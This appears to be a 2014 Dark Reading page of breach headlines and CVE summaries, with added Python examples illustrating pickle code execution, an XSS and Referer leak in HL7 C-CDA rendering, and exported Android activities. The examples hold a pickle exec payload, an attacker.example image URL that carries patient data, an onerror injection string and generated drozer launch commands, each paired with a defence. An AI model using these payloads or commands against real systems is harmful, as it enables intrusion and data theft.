Attacks/Breaches
Home Depot The Latest Hack Victim? (Quick Hits)
Home improvement chain, along with law enforcement and banks, is investigating 'unusual activity.'
By Kelly Jackson Higgins, Executive Editor at Dark Reading, 9/2/2014

How To Create A Risk 'Pain Chart' (News)
Consultant John Pironti outlines how to execute a risk-based approach to defending corporate assets.
By Brian Prince, Contributing Writer, Dark Reading, 8/29/2014

Why Are Security Pros Blasé About Compliance? (Commentary)
A survey of 500 IT and security decision makers in the UK and US shows that a majority are in the dark about the regulatory requirements for their organization.
By François Amigorena, Founder & CEO, IS Decisions, 8/29/2014

CryptoWall More Pervasive, Less Profitable Than CryptoLocker (News)
The former CryptoLocker wannabe has netted 625,000 infected systems and more than $1 million in ransoms.
By Sara Peters, Senior Editor at Dark Reading, 8/28/2014

Feds Investigating Breaches At JPMorgan, Other Banks (News)
JPMorgan is working with the FBI and US Secret Service to determine the scope of the breach, but other newly reported intrusions at financial firms may not be related.
By Kelly Jackson Higgins, Executive Editor at Dark Reading, 8/28/2014

Backoff, Dairy Queen, UPS & Retail's Growing PoS Security Problem (News)
Retail brands are trying to pass the buck for data security to banks and franchisees, say some experts.
By Sara Peters, Senior Editor at Dark Reading, 8/27/2014

Sony, XBox Victims Of DDoS, Hacktivist Threats (Quick Hits)
Hacktivists from Anonymous and from a presumed Islamic extremist group targeted a variety of online gaming services.
By Sara Peters, Senior Editor at Dark Reading, 8/26/2014

Top 5 Reasons Your Small Business Website is Under Attack (Commentary)
There is no such thing as "too small to hack." If a business has a website, hackers can exploit it.
By Chris Weltzien, CEO, 6Scan, 8/26/2014

10 Ways To Strengthen Healthcare Security
As recent hacks show, keeping a healthcare organization safe from security threats takes planning, technical expertise, and business knowledge. Has your team taken these 10 steps?
By Alison Diana, Senior Editor, 8/26/2014

Breach of Homeland Security Background Checks Raises Red Flags (News)
"We should be burning down the house over this," says a GRC expert.
By Sara Peters, Senior Editor at Dark Reading, 8/25/2014

All In For The Coming World of 'Things' (Commentary)
At a Black Hat round table, experts discuss the strategies necessary to lock down the Internet of Things, the most game-changing concept in Internet history.
By Don Bailey, Founder & CEO, Lab Mouse Security, 8/25/2014

Healthcare Industry, Feds Talk Information Sharing (News)
Representatives from the healthcare industry and government discuss the importance of threat-intelligence sharing in light of the Community Health Systems breach.
By Brian Prince, Contributing Writer, Dark Reading, 8/22/2014

Flash Poll: CSOs Need A New Boss (Commentary)
Only one in four respondents to our flash poll think the CSO should report to the CIO.
By Marilyn Cohodas, Community Editor, Dark Reading, 8/22/2014

Hacker Or Military? Best Of Both In Cyber Security (Commentary)
How radically different approaches play out across the security industry.
By John B. Dickson, CISSP, Principal, Denim Group, 8/21/2014

51 UPS Stores' Point-of-Sale Systems Breached (News)
Customers will not receive individual breach notifications.
By Sara Peters, Senior Editor at Dark Reading, 8/21/2014

Heartbleed Not Only Reason For Health Systems Breach (News)
Community Health Systems' bad patching practices are nothing compared to its poor encryption, network monitoring, fraud detection, and data segmentation, experts say.
By Sara Peters, Senior Editor at Dark Reading, 8/20/2014

Debugging The Myths Of Heartbleed (Commentary)
Does Heartbleed really wreak havoc without a trace? The media and many technical sites seemed convinced of this, but some of us were skeptical.
By Steve Riley, Technical Leader, Office of the CTO, Riverbed Technology, 8/20/2014

Nuclear Regulatory Commission Compromised 3 Times In Past 3 Years (Quick Hits)
Unnamed actors try to swipe privileged credentials.
By Sara Peters, Senior Editor at Dark Reading, 8/19/2014

Why John McAfee Is Paranoid About Mobile (Commentary)
Mobile apps are posing expanding risks to both enterprises and their customers. But maybe being paranoid about mobile is actually healthy for security.
By Peter Zavlaris, Analyst, RiskIQ, 8/19/2014

Community Health Systems Breach Atypical For Chinese Hackers (News)
Publicly traded healthcare organization's stock goes up as breach notifications go out.
By Sara Peters, Senior Editor at Dark Reading, 8/18/2014
Security Insights (Sophos)
3 Places to Enable 2-Factor Authentication Now
Two-factor authentication is a ubiquitous, mature technology. Whether or not you use it for your network, here are three external services for which you should immediately enable it.
Bug Report: Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2014-0485
Published: 2014-09-02
S3QL 1.18.1 and earlier uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object in (1) common.py or (2) local.py in backends/.
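The entry above names the bug class without showing it. As an added illustration (not S3QL's own code): a pickle stream stores a callable and its arguments from the attacker's `__reduce__`, and `pickle.loads` invokes them on the way in. Beside it, an `Unpickler` subclass whose `find_class` only resolves an allowlist of globals, which is how a backend that must keep reading pickle can refuse everything else. The metadata dict, the `Payload` class and the `PICKLE_DEMO_MARKER` environment variable are constructed for the example; the payload uses `exec` to set that variable where a real one would spawn a shell.

```python
import datetime
import io
import os
import pickle

# Environment variable the demo payload sets; stands in for a real side effect.
MARKER = "PICKLE_DEMO_MARKER"


def make_benign_pickle():
    """Metadata dict of the kind a storage backend stores (constructed)."""
    meta = {"name": "home-photos", "size": 1024,
            "mtime": datetime.datetime(2014, 9, 2, 12, 0, 0)}
    return pickle.dumps(meta)


class Payload:
    """Attacker-controlled object. pickle serializes whatever __reduce__
    returns: a callable plus arguments, which the loader then invokes.
    Here it is exec() with a snippet that sets an environment variable;
    a real payload would call os.system or subprocess instead."""
    def __reduce__(self):
        code = "import os; os.environ[%r] = 'attacker code ran'" % MARKER
        return (exec, (code,))


def make_malicious_pickle():
    return pickle.dumps(Payload())


def marker():
    return os.environ.get(MARKER)


def reset_marker():
    os.environ.pop(MARKER, None)


def unsafe_load(data):
    # The vulnerable pattern: pickle.loads on bytes received from a remote
    # backend. Any global named in the stream is imported and called.
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    # The only globals the loader may resolve. Plain containers and scalars
    # (dict, str, int, bytes) are built from opcodes and never reach
    # find_class, so the list stays tiny.
    ALLOWED = {("datetime", "datetime")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            "global %s.%s is forbidden" % (module, name))


def safe_load(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


if __name__ == "__main__":
    print("safe load of benign data:", safe_load(make_benign_pickle()))
    unsafe_load(make_malicious_pickle())
    print("after unsafe load, marker =", marker())
    try:
        safe_load(make_malicious_pickle())
    except pickle.UnpicklingError as e:
        print("restricted loader rejected payload:", e)
```

The allowlist is the control, not the subclass: `find_class` is consulted for every GLOBAL/STACK_GLOBAL opcode, so anything not listed (here `builtins.exec`) fails before it is called. A format with no code-loading semantics at all, such as JSON, removes the problem rather than fencing it.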

CVE-2014-3861
Published: 2014-09-02
Cross-site scripting (XSS) vulnerability in CDA.xsl in HL7 C-CDA 1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted reference element within a nonXMLBody element.

CVE-2014-3862
Published: 2014-09-02
CDA.xsl in HL7 C-CDA 1.1 and earlier allows remote attackers to discover potentially sensitive URLs via a crafted reference element that triggers creation of an IMG element with an arbitrary URL in its SRC attribute, leading to information disclosure in a Referer log.
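The two CDA.xsl entries above share one root cause: a `reference` value taken from the document ends up in an IMG SRC attribute. The added example below (Python, not the HL7 XSLT stylesheet) reproduces that pattern on a constructed C-CDA fragment, and beside it a renderer that escapes the value and accepts only document-relative references, which closes both the attribute break-out and the outbound fetch that leaks the viewer's URL in the Referer header. The sample XML and the hostname `attacker.example` are invented for the example.

```python
import html
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

HL7 = "{urn:hl7-org:v3}"

# Constructed C-CDA fragment. The three reference values stand for a
# legitimate relative attachment, an attacker's external URL, and an
# attribute break-out attempt; a real document usually carries one.
SAMPLE_CDA = """<ClinicalDocument xmlns="urn:hl7-org:v3">
  <component>
    <nonXMLBody>
      <text mediaType="image/png">
        <reference value="scan_page1.png"/>
        <reference value="http://attacker.example/collect.png?patient=123"/>
        <reference value="x&quot; onerror=&quot;alert(1)"/>
      </text>
    </nonXMLBody>
  </component>
</ClinicalDocument>"""


def reference_values(cda_xml):
    """Collect reference/@value under every nonXMLBody."""
    root = ET.fromstring(cda_xml)
    values = []
    for body in root.iter(HL7 + "nonXMLBody"):
        for ref in body.iter(HL7 + "reference"):
            values.append(ref.get("value", ""))
    return values


def render_unsafe(values):
    # The weak pattern: the reference value is dropped straight into an
    # IMG SRC attribute. A quote in the value closes the attribute and
    # adds an event handler (XSS); an external URL makes the viewer's
    # browser fetch it, sending the document URL as Referer.
    return "\n".join('<img src="%s"/>' % v for v in values)


# Characters a document-relative reference ("scan1.png", "#attachment1")
# legitimately needs; no quotes, spaces, colons or angle brackets.
SAFE_REF = re.compile(r"^[A-Za-z0-9_./#-]+$")


def is_local_reference(value):
    """True only for a scheme-less, host-less reference without traversal."""
    parts = urlsplit(value)
    return (parts.scheme == "" and parts.netloc == ""
            and not value.startswith("//")
            and ".." not in value
            and SAFE_REF.match(value) is not None)


def render_safe(values):
    # Defence in depth: reject anything that is not a local reference,
    # and still HTML-escape what is accepted before it enters an attribute.
    out = []
    for v in values:
        if is_local_reference(v):
            out.append('<img src="%s"/>' % html.escape(v, quote=True))
        else:
            out.append("<span>[external or malformed reference omitted]</span>")
    return "\n".join(out)


if __name__ == "__main__":
    vals = reference_values(SAMPLE_CDA)
    print("unsafe:\n" + render_unsafe(vals))
    print("safe:\n" + render_safe(vals))
```

Escaping alone would stop the break-out but not the Referer leak, and a scheme check alone would stop the external fetch but not a `"` inside a relative path; the hardened renderer needs both checks.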

CVE-2014-5076
Published: 2014-09-02
The La Banque Postale application before 3.2.6 for Android does not prevent the launching of an activity by a component of another application, which allows attackers to obtain sensitive cached banking information via crafted intents, as demonstrated by the drozer framework.
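What drozer finds in a case like this is an activity that any other app on the device can start. The added example below (not code from the La Banque Postale app or from drozer) audits an AndroidManifest.xml for such activities using the rule that applied to apps of that era: an activity with an intent-filter and no `android:exported` attribute is exported, an explicit attribute always wins, and an `android:permission` attribute gates callers. The manifest, package and component names are constructed, and `drozer_start_command` assumes the `app.activity.start --component <package> <component>` syntax of drozer 2.x.

```python
import xml.etree.ElementTree as ET

# Android attributes live in this namespace; element names do not.
A = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest for a hypothetical banking app. Package and
# component names are invented for the example.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.bank">
  <application android:label="Bank">
    <activity android:name=".LoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <!-- Exported implicitly: intent-filter present, android:exported absent -->
    <activity android:name=".AccountDetailsActivity">
      <intent-filter><action android:name="com.example.bank.VIEW_ACCOUNT"/></intent-filter>
    </activity>
    <activity android:name=".SettingsActivity" android:exported="true"/>
    <activity android:name=".InternalCacheActivity" android:exported="false">
      <intent-filter><action android:name="com.example.bank.REFRESH_CACHE"/></intent-filter>
    </activity>
    <activity android:name=".PrivateActivity"/>
    <activity android:name=".AdminActivity" android:exported="true"
              android:permission="com.example.bank.INTERNAL"/>
  </application>
</manifest>"""


def fqn(package, name):
    """Expand a manifest-relative component name (".Foo") to its full name."""
    return package + name if name.startswith(".") else name


def is_exported(activity):
    # Pre-API-31 default: exported when the attribute is absent but an
    # intent-filter is present; an explicit attribute overrides that.
    explicit = activity.get(A + "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return activity.find("intent-filter") is not None


def is_launcher(activity):
    for f in activity.findall("intent-filter"):
        cats = {c.get(A + "name") for c in f.findall("category")}
        if "android.intent.category.LAUNCHER" in cats:
            return True
    return False


def exported_activities(manifest_xml):
    """Every exported activity with its permission gate and launcher status."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    found = []
    for act in root.iter("activity"):
        if is_exported(act):
            found.append({"name": fqn(pkg, act.get(A + "name")),
                          "permission": act.get(A + "permission"),
                          "launcher": is_launcher(act)})
    return found


def risky_activities(manifest_xml):
    # Exported, not permission-protected, and not the launcher entry point:
    # any installed app can start these with a crafted intent.
    return sorted(a["name"] for a in exported_activities(manifest_xml)
                  if a["permission"] is None and not a["launcher"])


def drozer_start_command(package, component):
    # Assumed drozer 2.x syntax for launching an activity from the agent.
    return "run app.activity.start --component %s %s" % (package, component)


if __name__ == "__main__":
    for name in risky_activities(SAMPLE_MANIFEST):
        print(name, "->", drozer_start_command("com.example.bank", name))
```

The implicit branch in `is_exported` is the one that bites: the activity never says it is exported, yet any app can reach it. Android 12 (API 31) made the attribute mandatory for components with intent filters, but apps targeting older API levels still get the implicit default.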

CVE-2014-5136
Published: 2014-09-02
Cross-site scripting (XSS) vulnerability in Innovative Interfaces Sierra Library Services Platform 1.2_3 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.

Dark Reading Radio (archived episode)
This episode of Dark Reading Radio looks at information security from the large-enterprise point of view, with interviews featuring Ron Plesco, Cyber Investigations, Intelligence & Analytics at KPMG, and Chris Inglis and Chris Bell of Securonix.